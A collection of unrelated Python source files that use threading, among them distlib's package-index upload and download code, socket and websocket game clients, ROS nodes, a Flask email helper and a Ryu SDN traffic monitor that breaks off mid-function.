if sig_file:
with open(sig_file, 'rb') as f:
sig_data = f.read()
files.append(('gpg_signature', os.path.basename(sig_file),
sig_data))
shutil.rmtree(os.path.dirname(sig_file))
request = self.encode_request(d.items(), files)
return self.send_request(request)
def upload_documentation(self, metadata, doc_dir):
"""
Upload documentation to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the documentation to be
uploaded.
:param doc_dir: The pathname of the directory which contains the
documentation. This should be the directory that
contains the ``base.html`` for the documentation.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.isdir(doc_dir):
raise DistlibException('not a directory: %r' % doc_dir)
fn = os.path.join(doc_dir, 'base.html')
if not os.path.exists(fn):
raise DistlibException('not found: %r' % fn)
metadata.validate()
name, version = metadata.name, metadata.version
zip_data = zip_dir(doc_dir).getvalue()
fields = [(':action', 'doc_upload'),
('name', name), ('version', version)]
files = [('content', name, zip_data)]
request = self.encode_request(fields, files)
return self.send_request(request)
def get_verify_command(self, signature_filename, data_filename,
keystore=None):
"""
Return a suitable command for verifying a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The verifying command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, '--status-fd', '2', '--no-tty']
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(['--homedir', keystore])
cmd.extend(['--verify', signature_filename, data_filename])
logger.debug('invoking: %s', ' '.join(cmd))
return cmd
def verify_signature(self, signature_filename, data_filename,
keystore=None):
"""
Verify a signature for a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: True if the signature was verified, else False.
"""
if not self.gpg:
raise DistlibException('verification unavailable because gpg '
'unavailable')
cmd = self.get_verify_command(signature_filename, data_filename,
keystore)
rc, stdout, stderr = self.run_command(cmd)
if rc not in (0, 1):
raise DistlibException('verify command failed with error '
'code %s' % rc)
return rc == 0
def download_file(self, url, destfile, digest=None, reporthook=None):
"""
This is a convenience method for downloading a file from an URL.
Normally, this will be a file from the index, though currently
no check is made for this (i.e. a file can be downloaded from
anywhere).
The method is just like the :func:`urlretrieve` function in the
standard library, except that it allows digest computation to be
done during download and checking that the downloaded data
matched any expected value.
:param url: The URL of the file to be downloaded (assumed to be
available via an HTTP GET request).
:param destfile: The pathname where the downloaded file is to be
saved.
:param digest: If specified, this must be a (hasher, value)
tuple, where hasher is the algorithm used (e.g.
``'md5'``) and ``value`` is the expected value.
:param reporthook: The same as for :func:`urlretrieve` in the
standard library.
"""
if digest is None:
digester = None
logger.debug('No digest specified')
else:
if isinstance(digest, (list, tuple)):
hasher, digest = digest
else:
hasher = 'md5'
digester = getattr(hashlib, hasher)()
logger.debug('Digest specified: %s' % digest)
# The following code is equivalent to urlretrieve.
# We need to do it this way so that we can compute the
# digest of the file as we go.
with open(destfile, 'wb') as dfp:
# addinfourl is not a context manager on 2.x
# so we have to use try/finally
sfp = self.send_request(Request(url))
try:
headers = sfp.info()
blocksize = 8192
size = -1
read = 0
blocknum = 0
if "content-length" in headers:
size = int(headers["Content-Length"])
if reporthook:
reporthook(blocknum, blocksize, size)
while True:
block = sfp.read(blocksize)
if not block:
break
read += len(block)
dfp.write(block)
if digester:
digester.update(block)
blocknum += 1
if reporthook:
reporthook(blocknum, blocksize, size)
finally:
sfp.close()
# check that we got the whole file, if we can
if size >= 0 and read < size:
raise DistlibException(
'retrieval incomplete: got only %d out of %d bytes'
% (read, size))
# if we have a digest, it must match.
if digester:
actual = digester.hexdigest()
if digest != actual:
raise DistlibException('%s digest mismatch for %s: expected '
'%s, got %s' % (hasher, destfile,
digest, actual))
logger.debug('Digest verified: %s', digest)
def send_request(self, req):
"""
Send a standard library :class:`Request` to PyPI and return its
response.
:param req: The request to send.
:return: The HTTP response from PyPI (a standard library HTTPResponse).
"""
handlers = []
if self.password_handler:
handlers.append(self.password_handler)
if self.ssl_verifier:
handlers.append(self.ssl_verifier)
opener = build_opener(*handlers)
return opener.open(req)
def encode_request(self, fields, files):
"""
Encode fields and files for posting to an HTTP server.
:param fields: The fields to send as a list of (fieldname, value)
tuples.
:param files: The files to send as a list of (fieldname, filename,
file_bytes) tuple.
"""
# Adapted from packaging, which in turn was adapted from
# http://code.activestate.com/recipes/146306
parts = []
boundary = self.boundary
for k, values in fields:
if not isinstance(values, (list, tuple)):
values = [values]
for v in values:
parts.extend((
b'--' + boundary,
('Content-Disposition: form-data; name="%s"' %
k).encode('utf-8'),
b'',
v.encode('utf-8')))
for key, filename, value in files:
parts.extend((
b'--' + boundary,
('Content-Disposition: form-data; name="%s"; filename="%s"' %
(key, filename)).encode('utf-8'),
b'',
value))
parts.extend((b'--' + boundary + b'--', b''))
body = b'\r\n'.join(parts)
ct = b'multipart/form-data; boundary=' + boundary
headers = {
'Content-type': ct,
'Content-length': str(len(body))
}
return Request(self.url, body, headers)
def search(self, terms, operator=None):
if isinstance(terms, string_types):
terms = {'name': terms}
if self.rpc_proxy is None:
self.rpc_proxy = ServerProxy(self.url, timeout=3.0)
return self.rpc_proxy.search(terms, operator or 'and')
|
bridgeClient.py | #! /usr/bin/python
import socket
import threading
from time import sleep
import sys
import pygame
class bridgeConnection():
def __init__(self):
#self.HOST = raw_input("HOST IP : ")
self.HOST = "143.248.12.189"
self.PORT = 50000
self.DATA_SIZE = 128 # maximum data length which can be sent in once
self.endThread = False
self.makeConnection()
self.dataList = {'cmd':[],'grid':[], 'turn':[]} #Sort the type of the data
if not self.soc:
print "Server is not opened"
""" for test """
#else:
#while 1:
#msg = raw_input("send data : ")
#self.sendData(msg)
#if msg == "quit" or msg == "exit":
#self.endThread = True
#break
def makeConnection(self):
# make socket and connect to the server
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
soc.settimeout(5.0) # maximum wating time (seconds)
connected = False
while not connected:
try:
print "trying to connect " + self.HOST
soc.connect( (self.HOST, self.PORT) )
connected = True
print "Connected!"
#soc.settimeout(None)
break
except socket.timeout:
print "Exceeded time limit"
connectAgain = raw_input("try again?(y/n)")
if connectAgain == "y" or connectAgain == "Y":
continue
else:
return
except socket.error:
print "Access denied"
sleep(1)
# [ NOT YET ] if QUIT command is received, call 'sys.exit'
self.soc = False
return
self.soc = soc
# Threading allows to get data whenever it's delievered
self.T = threading.Thread(target = self.receiveData)
self.T.start()
def sendData(self, data):
""" Send data (string type) to the server """
if len(data) <= self.DATA_SIZE:
self.soc.send(data.encode('UTF-8'))
print "Data '%s' is sent successfully" %data
else:
print "Data packet size exceeded!"
def receiveData(self):
""" Receive data (string type) from the server """
while not self.endThread:
try:
data = self.soc.recv(self.DATA_SIZE) # receive data whose length <= DATA_SIZE
print "data is : %s" %data
except socket.timeout:
#print "socket timed out"
continue
except:
print "Connection is lost"
break
if len(data)>3:
self.dataList['cmd'].append(data) # save the received data
elif len(data)<3:
self.dataList['grid'].append(data)
else:
self.dataList['turn'].append(data)
self.soc.close() # disconnect the connection
def disconnect(self):
self.endThread = True
print "joining the thread..."
self.T.join()
print "thread is joined"
pygame.quit()
sys.exit()
'''
class userInterfaceWindow():
def __init__(self, screen):
self.screen = screen
self.clients = []
def a():
pass
'''
if __name__ == "__main__":
client = bridgeConnection()
print "end session"
sleep(15)
client.disconnect()
|
client.py | import asyncio
from threading import Thread
import websocket
import modules.logger as logger
import modules.message as message_module
logger = logger.get_logger(__name__)
connected = False
def send_message(websocket, msg):
# msg = input("Message: ")
if msg == '':
return
if msg == '/end':
message = message_module.Message('CONNECTION_CLOSE', msg)
elif msg.startswith('/setname'):
message = message_module.Message('TEXT', msg)
else:
message = message_module.Message('TEXT', msg)
websocket.send(message.pack())
if message.message_type == 'CONNECTION_CLOSE':
print('Connection closed, press enter to continue.')
websocket.close()
return
def on_message(websocket, packed_response):
if packed_response is None:
return
response = message_module.Message.from_packed(packed_response)
if response.message_type == 'TEXT':
logger.info(response.data)
elif response.message_type == 'STATUS':
logger.info(response.data)
def on_open(websocket):
global connected
connected = True
websocket.send(message_module.Message('HELLO', "").pack())
def on_error(websocket, error_msg):
logger.error(error_msg)
def on_close(websocket):
global connected
connected = False
raise Exception('websocket closed, do something')
def game_thread(app):
while True:
message = input()
if not connected:
break
try:
send_message(app, message)
except websocket._exceptions.WebSocketConnectionClosedException as e:
logger.info('Connection is closed')
break
except Exception as e:
raise e
def run(ip, port):
websocket_url = f'ws://{ip}:{port}'
app = websocket.WebSocketApp(websocket_url,
on_message=on_message,
on_error=on_error,
on_close=on_close,
on_open=on_open)
threads = [Thread(target=func, args=args) for func, args in [(app.run_forever, ()),
(game_thread, (app, ))]]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
|
broadcast_handler.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
########################################################################
#
# Copyright (c) 2016 Baidu.com, Inc. All Rights Reserved
#
########################################################################
"""
File: broadcast_manager.py
Author: haifeng(haifeng@baidu.com)
Date: 2016/11/30 19:23:31
"""
import os
import json
import time
import socket
import struct
import decimal
import logging
import traceback
import threading
import functools
import rospy.core
from rospy.core import signal_shutdown
from rospy.impl.registration import Registration
from rospy.impl.registration import get_topic_manager
from rospy.impl.registration import get_service_manager
from rospy.impl.registration import get_node_handler
from rosgraph.network import parse_http_host_and_port,get_host_name
import sys
env = os.environ.get('LD_LIBRARY_PATH')
for sub_path in env.split(':'):
sys.path.append(sub_path)
from rospy.impl import participant
REQUEST_TYPE = 'request_type'
NODE_NAME = 'node_name'
XMLRPC_URI = 'xmlrpc_uri'
TIMESTAMP = 'timestamp'
NODE_TIME = "node_time"
TOPIC_NAME = "topic_name"
TOPIC_TYPE = "topic_type"
TOPIC_URI = "topic_uri"
SERVICE_NAME = "service_name"
SERVICE_TYPE = "service_type"
SERVICE_URI = "service_uri"
class Singleton(type):
_instances = {}
def __call__(cls, *args, **kwargs):
if cls not in cls._instances:
cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)
return cls._instances[cls]
class BroadcastHandler(object):
"""
BroadcastHandler.
"""
__metaclass__ = Singleton
def __init__(self, handler):
"""
brief info for: __init__
"""
super(BroadcastHandler, self).__init__()
self._logger = logging.getLogger(__name__)
self._logger.setLevel(logging.INFO)
self.callback = ["registerPublisher",
"unregisterPublisher",
"registerSubscriber",
"unregisterSubscriber",
"registerService",
"unregisterService",
"lookupService",
"getTopicTypes",
"lookupNode",
]
self._handler = handler
self._name = "rosmaster"
self._participant = participant.Participant(self._name)
self._participant.init_py()
self._broardcast_manager_thread = threading.Thread(
target=self.run, args=())
self._broardcast_manager_thread.setDaemon(True)
self._broardcast_manager_thread.start()
def run(self):
"""
brief info for: thread run method
"""
#print "starting broadcast_manager!"
self._logger.debug("starting broadcast_manager!")
while True:
try:
msg = self._participant.read_msg()
if msg is None:
continue
if(len(msg) > 0):
data = self._unpack_msg(msg.strip())
self._logger.debug("recv data: %s " % data)
if data[REQUEST_TYPE] in self.callback:
cb = '_' + data[REQUEST_TYPE] + "Callback"
func = getattr(self, cb)
func(data)
pass
else:
self._logger.error("[broadcast_handler] invalid request type: %s" % data[REQUEST_TYPE])
else:
time.sleep(0.005)
except Exception as e:
self._logger.error("broadcast_manager thread error is %s" % e)
print("broadcast_manager thread error is %s" % e)
finally:
pass
def getUri(self, caller_id):
"""
getUri
"""
return 1, "", self._uri
def getPid(self, caller_id):
"""
Get the PID of this server
"""
return 1, "", os.getpid()
def _registerPublisherCallback(self, data):
name = data[NODE_NAME]
topic = data[TOPIC_NAME]
datatype = data[TOPIC_TYPE]
uri = data[XMLRPC_URI]
#print(data)
self._handler.registerPublisher(name, topic, datatype, uri)
def _unregisterPublisherCallback(self, data):
name = data[NODE_NAME]
topic = data[TOPIC_NAME]
uri = data[XMLRPC_URI]
self._handler.unregisterPublisher(name, topic, uri)
def _registerSubscriberCallback(self, data):
name = data[NODE_NAME]
topic = data[TOPIC_NAME]
datatype = data[TOPIC_TYPE]
uri = data[XMLRPC_URI]
self._handler.registerSubscriber(name, topic, datatype, uri)
def _unregisterSubscriberCallback(self, data):
name = data[NODE_NAME]
topic = data[TOPIC_NAME]
uri = data[XMLRPC_URI]
self._handler.unregisterSubscriber(name, topic, uri)
def _registerServiceCallback(self, data):
name = data[NODE_NAME]
service_name = data[SERVICE_NAME]
service_uri = data[SERVICE_URI]
uri = data[XMLRPC_URI]
self._handler.registerService(name, service_name, service_uri, uri)
def _unregisterServiceCallback(self, data):
name = data[NODE_NAME]
service_name = data[SERVICE_NAME]
service_uri = data[SERVICE_URI]
self._handler.unregisterService(name, service_name, service_uri)
def _send(self, data):
"""
brief info for: Get _master_handler internal dict stuct according to dict_type
"""
self._participant.send(data)
def _recv(self, size=1024):
"""
brief info for: Get _master_handler internal dict stuct according to dict_type
"""
msg = addr = None
try:
msg, addr = self._sock.recvfrom(size)
except Exception as e:
self._logger.error("socket recv error is %s" % e)
self._logger.error(traceback.format_exc())
finally:
pass
return msg, addr
def _unpack_msg(self, msg):
data = json.loads(msg)
return data
def _pack_msg(self, data):
return json.dumps(data)
|
Barrier_studikasus.py | from random import randrange
from threading import Barrier, Thread
from time import ctime, sleep
jmlh_org = 3
kota_tujuan = Barrier(jmlh_org)
orangmudik = ['Asep Gokil', 'Udin Wazowski', 'Papope Cool']
def mudik():
name = orangmudik.pop()
sleep(randrange(2, 5)) # Menunggu sesuai waktu antara 2 sampai 5 detik secara random
print('%s Sampai Ke Kota pada hari: %s \n' % (name, ctime()))
kota_tujuan.wait() # Menunggu semua thread selesai
def main():
threads = []
print('Mudik Dilaksanakan')
# Membuat Thread
for i in range(jmlh_org):
# Membuat thread baru untuk menjalankan function
threads.append(Thread(target=mudik))
threads[-1].start()
# Menunggu semua thread selesai
for thread in threads:
thread.join()
print('Alhamdulillah, sampai ditempat tujuan dengan selamat') # Thread selesai
if __name__ == "__main__":
main()
|
talker.py | import rclpy
import os
import pyvcroid2
import simpleaudio
import winsound
import threading
from ctypes import *
from rclpy.node import Node
import std_msgs.msg
from rcl_interfaces.msg import ParameterType
from rcl_interfaces.msg import SetParametersResult
# Talker node
class TalkerNode(Node):
def __init__(self):
super().__init__('voiceroid2')
try:
# Initialize pyvcroid2
self.vc = pyvcroid2.VcRoid2()
# Load language library
language_name = self.declare_parameter("language", "standard").value
self.vc.loadLanguage(language_name)
self.get_logger().info("Language library '{0}' was loaded".format(language_name))
# Load voice library
voice_list = self.vc.listVoices()
if len(voice_list) == 0:
raise Exception("No voice library")
voice_name = self.declare_parameter("voice", voice_list[0]).value
self.vc.loadVoice(voice_name)
self.get_logger().info("Voice library '{0}' was loaded".format(voice_name))
# Load dictionaries
rfid = c_char_p(b"\xD0\x9A\xD3\xFD\x8F\x23\xAF\x46\xAD\xB4\x6C\x85\x48\x03\x69\xC7")
pwstr = c_wchar_p()
windll.shell32.SHGetKnownFolderPath(rfid, c_uint32(0), c_void_p(), byref(pwstr))
documents_path = wstring_at(pwstr)
windll.ole32.CoTaskMemFree(pwstr)
default_pdic_path = documents_path + "\\VOICEROID2\\フレーズ辞書\\user.pdic"
default_wdic_path = documents_path + "\\VOICEROID2\\単語辞書\\user.wdic"
default_sdic_path = documents_path + "\\VOICEROID2\\記号ポーズ辞書\\user.sdic"
pdic_path = self.declare_parameter("phrase_dictionary", default_pdic_path).value
wdic_path = self.declare_parameter("word_dictionary", default_wdic_path).value
sdic_path = self.declare_parameter("symbol_dictionary", default_sdic_path).value
if (pdic_path != default_pdic_path) or os.path.isfile(pdic_path):
self.vc.reloadPhraseDictionary(pdic_path)
self.get_logger().info("Phrase dictionary '{0}' was loaded".format(pdic_path))
if (wdic_path != default_wdic_path) or os.path.isfile(wdic_path):
self.vc.reloadWordDictionary(wdic_path)
self.get_logger().info("Word dictionary '{0}' was loaded".format(wdic_path))
if (sdic_path != default_sdic_path) or os.path.isfile(sdic_path):
self.vc.reloadSymbolDictionary(sdic_path)
self.get_logger().info("Symbol dictionary '{0}' was loaded".format(sdic_path))
except Exception as e:
self.get_logger().error(e)
raise e
# Load settings
subscribe_topic_name = self.declare_parameter("subscribe_topic_name", "text").value
publish_topic_name = self.declare_parameter("publish_topic_name", None).value
play_mode = self.declare_parameter("play_mode", "stop").value
if play_mode == "wait":
self.stop_before_play = False
self.use_winsound = True
elif play_mode == "overlap":
self.stop_before_play = False
self.use_winsound = False
else:
self.stop_before_play = True
self.use_winsound = False
# Initialize node
self.subscription = self.create_subscription(
std_msgs.msg.String,
subscribe_topic_name,
self.text_callback,
10)
if publish_topic_name is not None:
self.publisher = self.create_publisher(std_msgs.msg.ByteMultiArray, publish_topic_name, 10)
self.get_logger().info("Speech data will be published as topic '{0}'".format(publish_topic_name))
else:
self.publisher = None
self.get_logger().info("Speech data will be played by local computer")
self.add_on_set_parameters_callback(self.parameter_callback)
def text_callback(self, msg):
text = msg.data
try:
speech, _ = self.vc.textToSpeech(text, raw = (self.publisher is None) and (not self.use_winsound))
except Exception as e:
self.get_logger().warn(str(e))
return
if self.publisher is None:
# Play sound in worker thread
t = threading.Thread(target=self.play_sound, args=(speech,))
t.start()
else:
# Publish sound data
msg = std_msgs.msg.ByteMultiArray()
msg.data = [speech]
self.publisher.publish(msg)
def parameter_callback(self, params):
for param in params:
pass
return SetParametersResult(successful=True)
def play_sound(self, speech):
if self.use_winsound:
# play_mode == "wait"
winsound.PlaySound(speech, winsound.SND_MEMORY)
else:
if self.stop_before_play:
# play_mode == "stop"
simpleaudio.stop_all()
else:
# play_mode == "overlap"
pass
obj = simpleaudio.play_buffer(speech, 1, 2, 44100)
obj.wait_done()
def main(args=None):
rclpy.init(args=args)
node = TalkerNode()
rclpy.spin(node)
node.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main()
|
email.py | from threading import Thread
from flask import render_template
from flask_mail import Message
from app import app, mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(subject, sender, recipients, text_body, html_body):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
Thread(target=send_async_email, args=(app, msg)).start()
def send_password_reset_email(user):
token = user.get_reset_password_token()
send_email('[NH High Peaks] Reset Your Password',
sender=app.config['ADMINS'][0],
recipients=[user.email],
text_body=render_template('email/reset_password.txt',
user=user, token=token),
html_body=render_template('email/reset_password.html',
user=user, token=token)) |
network_monitor_GA.py | # Copyright (C) 2016 Huang MaChi at Chongqing University
# of Posts and Telecommunications, Chongqing, China.
# Copyright (C) 2016 Li Cheng at Beijing University of Posts
# and Telecommunications. www.muzixing.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from threading import Thread
import copy
import time
from operator import attrgetter
# import GA_compute
from ryu import cfg
from ryu.base import app_manager
from ryu.base.app_manager import lookup_service_brick
from ryu.controller import ofp_event
from ryu.controller.handler import MAIN_DISPATCHER, DEAD_DISPATCHER
from ryu.controller.handler import set_ev_cls
from ryu.ofproto import ofproto_v1_3
from ryu.lib import hub
from DemandEstimation import demand_estimation
from GA_test import GaProcessor
import setting
from ryu.lib.packet import ethernet
# import PureSDN2 as sf
CONF = cfg.CONF
class NetworkMonitor(app_manager.RyuApp):
"""
NetworkMonitor is a Ryu app for collecting traffic information.
"""
OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]
def __init__(self, *args, **kwargs):
super(NetworkMonitor, self).__init__(*args, **kwargs)
self.name = 'monitor'
self.datapaths = {}
self.port_stats = {}
self.port_speed = {}
self.flow_stats = {}
self.pre_GFF_path = {}
self.flow_speed = {}
self.stats = {}
self.flow_index = []
self.select = {}
self.congested=False
self.flows_len = 0
self.flows = {}
self.traffics={}
self.hostsList = []
self.port_features = {}
self.free_bandwidth = {} # self.free_bandwidth = {dpid:{port_no:free_bw,},} unit:Kbit/s
self.link_dropped={}
self.link_errors={}
self.link_info={'bandwidth':{},'loss':{},'errors':{}}
self.current_free_bandwidth={}
self.awareness = lookup_service_brick('awareness')
# self.shortest_forwarding = lookup_service_brick('shortest_forwarding')
self.graph = None
self.capabilities = None
self.best_paths = None
self.k=0
self.gp = GaProcessor()
# Start to green thread to monitor traffic and calculating
# free bandwidth of links respectively.
self.monitor_thread = hub.spawn(self._monitor)
self.paths={}
def _monitor(self):
"""
Main entry method of monitoring traffic.
"""
while CONF.weight == 'bw' or CONF.weight=='hop':
self.stats['flow'] = {}
self.stats['port'] = {}
self.statRecord = []
self.flows = {}
# self.traffics={}
self.congested=False
for dp in self.datapaths.values():
self.port_features.setdefault(dp.id, {})
self._request_stats(dp)
# Refresh data.
self.create_graph(self.link_info)
self.capabilities = None
self.best_paths = None
hub.sleep(setting.MONITOR_PERIOD)
if self.stats['flow'] or self.stats['port']:
self.show_stat('flow')
self.show_stat('port')
hub.sleep(1)
def _save_bw_graph(self):
"""
Save bandwidth data into networkx graph object.
"""
while CONF.weight == 'bw' or CONF.weight=='hop':
# self.graph = self.create_bw_graph(self.free_bandwidth)
self.create_static_bw_graph()
self.logger.debug("save free bandwidth")
#self.show_topology()
hub.sleep(setting.MONITOR_PERIOD)
@set_ev_cls(ofp_event.EventOFPStateChange,
[MAIN_DISPATCHER, DEAD_DISPATCHER])
def _state_change_handler(self, ev):
"""
Record datapath information.
"""
datapath = ev.datapath
if ev.state == MAIN_DISPATCHER:
if not datapath.id in self.datapaths:
self.logger.debug('register datapath: %016x', datapath.id)
self.datapaths[datapath.id] = datapath
elif ev.state == DEAD_DISPATCHER:
if datapath.id in self.datapaths:
self.logger.debug('unregister datapath: %016x', datapath.id)
del self.datapaths[datapath.id]
else:
pass
@set_ev_cls(ofp_event.EventOFPFlowStatsReply, MAIN_DISPATCHER)
def _flow_stats_reply_handler(self, ev):
"""
Save flow stats reply information into self.flow_stats.
Calculate flow speed and Save it.
(old) self.flow_stats = {dpid:{(in_port, ipv4_dst, out-port):[(packet_count, byte_count, duration_sec, duration_nsec),],},}
(old) self.flow_speed = {dpid:{(in_port, ipv4_dst, out-port):[speed,],},}
(new) self.flow_stats = {dpid:{(priority, ipv4_src, ipv4_dst):[(packet_count, byte_count, duration_sec, duration_nsec),],},}
(new) self.flow_speed = {dpid:{(priority, ipv4_src, ipv4_dst):[speed,],},}
Because the proactive flow entrys don't have 'in_port' and 'out-port' field.
Note: table-miss, LLDP and ARP flow entries are not what we need, just filter them.
"""
body = ev.msg.body
dpid = ev.msg.datapath.id
self.statRecord.append(dpid)
self.stats['flow'][dpid] = body
self.flow_stats.setdefault(dpid, {})
self.flow_speed.setdefault(dpid, {})
for stat in sorted([flow for flow in body if (
(flow.priority not in [0, 25, 65535]) and (flow.match.get('ipv4_src')) and (flow.match.get('ipv4_dst')))],
key=lambda flow: (flow.priority, flow.match.get('ipv4_src'), flow.match.get('ipv4_dst'))):
src = stat.match['ipv4_src']
dst = stat.match['ipv4_dst']
for f in self.newComingFlows:
if f[0]==src and f[1]==dst:
swPair=f[(src,dst)]
key = (stat.priority,src,dst)
value = (stat.packet_count, stat.byte_count,
stat.duration_sec, stat.duration_nsec)
self._save_stats(self.flow_stats[dpid], key, value, 5)
# Get flow's speed and Save it.
pre = 0
period = setting.MONITOR_PERIOD
tmp = self.flow_stats[dpid][key]
if len(tmp) > 1:
pre = tmp[-2][1]
period = self._get_period(tmp[-1][2], tmp[-1][3], tmp[-2][2], tmp[-2][3])
speed = self._get_speed(self.flow_stats[dpid][key][-1][1], pre, period)
self._save_stats(self.flow_speed[dpid], key, speed, 5)
# Record flows thatport need to be rescheduled. (hmc)
flowDemand = speed * 8.0 / (setting.MAX_CAPACITY * 1024)
if flowDemand >0.1:
self.flows[key]={'src': src, 'dst': dst,'speed':speed,'priority': stat.priority,'swPair':swPair}
# Estimate flows' demands if all the flow_stat replies are received.
if len(self.statRecord)==8 and self.flows:
flows = sorted([flow for flow in self.flows.values()], key=lambda flow: (flow['src'], flow['dst']))
# hostsList = sorted(self.hostsList)
# self._demandEstimator(flows, hostsList)
#if self.congested==1:
print("it is time to reroute!")
#self._demandEstimator(flows,hostsList)
# self._reroute(flows)
else:
pass
def _demandEstimator(self,flows,hostsList):
estimated_flows = demand_estimation(flows, hostsList)
self._reroute(estimated_flows)
def _reroute(self, flows):
# estimated_flows = demand_estimation(flows, hostsList)
self.traffics={}
count=0
j=0
route_list=[]
for flow in flows:
self.paths[flow['swPair']]=self._ip2sw(flow['swPair'])
self.traffics[count]=flow
count=count+1
currentFlows=self.traffics
flow_len=len(currentFlows)
if flow_len > 1:
start = time.time()
route_list=GA_compute._GA_start(flow_len)
end = time.time()
print("computing time "+str(end-start))
if route_list != []:
for k in route_list:
flow = currentFlows[j]
j = j + 1
core = 1001 + k % 4
Thread(target=NetworkMonitor._GlobalFirstFit,args=(self,flow,core)).start()
def _ip2sw(self,swPair):
src_dp = swPair[0]
dst_dp = swPair[1]
paths = self.awareness.shortest_paths.get(src_dp).get(dst_dp)
return paths
def swToSegments(self,path):
datapaths=self.datapaths
link_to_port=self.awareness.link_to_port
first_dp = datapaths[path[0]]
portList = [] # it includes all push mpls labels of the path
Pathlen = len(path)
if Pathlen == '':
self.logger.info("Path error!")
return
port_pair = self.get_port_pair_from_link(link_to_port, path[0], path[1])
if port_pair is None:
self.logger.info("Port not found in first hop.")
return
first_output = port_pair[0]
portList.append(first_output)
for i in xrange(1, Pathlen - 1):
port_next = self.get_port_pair_from_link(link_to_port, path[i], path[i + 1])
if port_next:
port = port_next[0]
portList.append(port)
return first_dp,portList
def _GlobalFirstFit(self,flow,core):
'''
Do the Hedera Global First Fit here.
self.awareness.link_to_port = {(src_dpid,dst_dpid):(src_port,dst_port),}
self.free_bandwidth = {dpid:{port_no:free_bw,},} Unit:Kbit/s
'''
src_ip=flow['src']
dst_ip=flow['dst']
paths=self._ip2sw(src_ip,dst_ip)
for path in paths:
if path[int((len(path) - 1) / 2)] == core:
bucket=self.swToSegments(path)
self._install_GFF_path(bucket, flow['match'], flow['priority'])
def _install_GFF_path(self, bucket, match, priority):
'''
Installing the Global First Fit path.
"match": {"dl_type": 2048, "in_port": 3,
"ipv4_src": "10.1.0.1", "ipv4_dst": "10.8.0.2"}
flow_info = (eth_type, src_ip, dst_ip, priority)
'''
flow_info = (match['eth_type'], match['ipv4_src'], match['ipv4_dst'], priority)
# Install flow entries to datapaths along the path.
self.Segment_forwarding(flow_info,bucket)
def Segment_forwarding(self,flow_info,bucket):
datapath=bucket[0]
segmentStack=bucket[1]
ofproto=datapath.ofproto
parser = datapath.ofproto_parser
eth_mpls=ethernet.ether.ETH_TYPE_MPLS
actions = []
while len(segmentStack)>1:
mpls_label=segmentStack.pop()
f_label = datapath.ofproto_parser.OFPMatchField.make(datapath.ofproto.OXM_OF_MPLS_LABEL, mpls_label)
actions.append(parser.OFPActionPushMpls(eth_mpls))
actions.append(parser.OFPActionSetField(f_label))
actions.append(parser.OFPActionOutput(segmentStack.pop(),0))
inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS, actions)]
match = parser.OFPMatch(
eth_type=flow_info[0],ipv4_src=flow_info[1], ipv4_dst=flow_info[2]
)
mod = parser.OFPFlowMod(datapath=datapath, priority=flow_info[-1]+1,
table_id=0,
idle_timeout=2,
hard_timeout=0,
match=match, instructions=inst)
datapath.send_msg(mod)
def install_flow(self, datapaths, link_to_port, path, flow_info):
'''
Install flow entries for datapaths.
path=[dpid1, dpid2, ...]
flow_info = (eth_type, src_ip, dst_ip, priority)
self.awareness.access_table = {(sw,port):(ip, mac),}
'''
if path is None or len(path) == 0:
self.logger.info("Path error!")
return
in_port = None
for key in self.awareness.access_table.keys():
if self.awareness.access_table[key][0] == flow_info[1]:
in_port = key[1]
first_dp = datapaths[path[0]]
out_port = first_dp.ofproto.OFPP_LOCAL
# Install flow entry for intermediate datapaths.
for i in xrange(1, len(path) - 2) :
port = self.get_port_pair_from_link(link_to_port, path[i - 1], path[i])
port_next = self.get_port_pair_from_link(link_to_port, path[i], path[i + 1])
if port and port_next:
src_port, dst_port = port[1], port_next[0]
datapath = datapaths[path[i]]
self.send_flow_mod(datapath, flow_info, src_port, dst_port)
# Install flow entry for the first datapath.
port_pair = self.get_port_pair_from_link(link_to_port, path[0], path[1])
if port_pair is None:
self.logger.info("Port not found in first hop.")
return
out_port = port_pair[0]
self.send_flow_mod(first_dp, flow_info, in_port, out_port)
def get_port_pair_from_link(self, link_to_port, src_dpid, dst_dpid):
"""
Get port pair of link, so that controller can install flow entry.
link_to_port = {(src_dpid,dst_dpid):(src_port,dst_port),}
"""
if (src_dpid, dst_dpid) in link_to_port:
return link_to_port[(src_dpid, dst_dpid)]
else:
self.logger.info("Link from dpid:%s to dpid:%s is not in links" %
(src_dpid, dst_dpid))
return None
def send_flow_mod(self, datapath, flow_info, src_port, dst_port):
"""
Build flow entry, and send it to datapath.
flow_info = (eth_type, src_ip, dst_ip, priority)
"""
parser = datapath.ofproto_parser
actions = []
actions.append(parser.OFPActionOutput(dst_port))
if len(flow_info) == 7:
if flow_info[-3] == 6:
if flow_info[-2] == 'src':
match = parser.OFPMatch(
in_port=src_port, eth_type=flow_info[0],
ipv4_src=flow_info[1], ipv4_dst=flow_info[2],
ip_proto=6, tcp_src=flow_info[-1])
elif flow_info[-2] == 'dst':
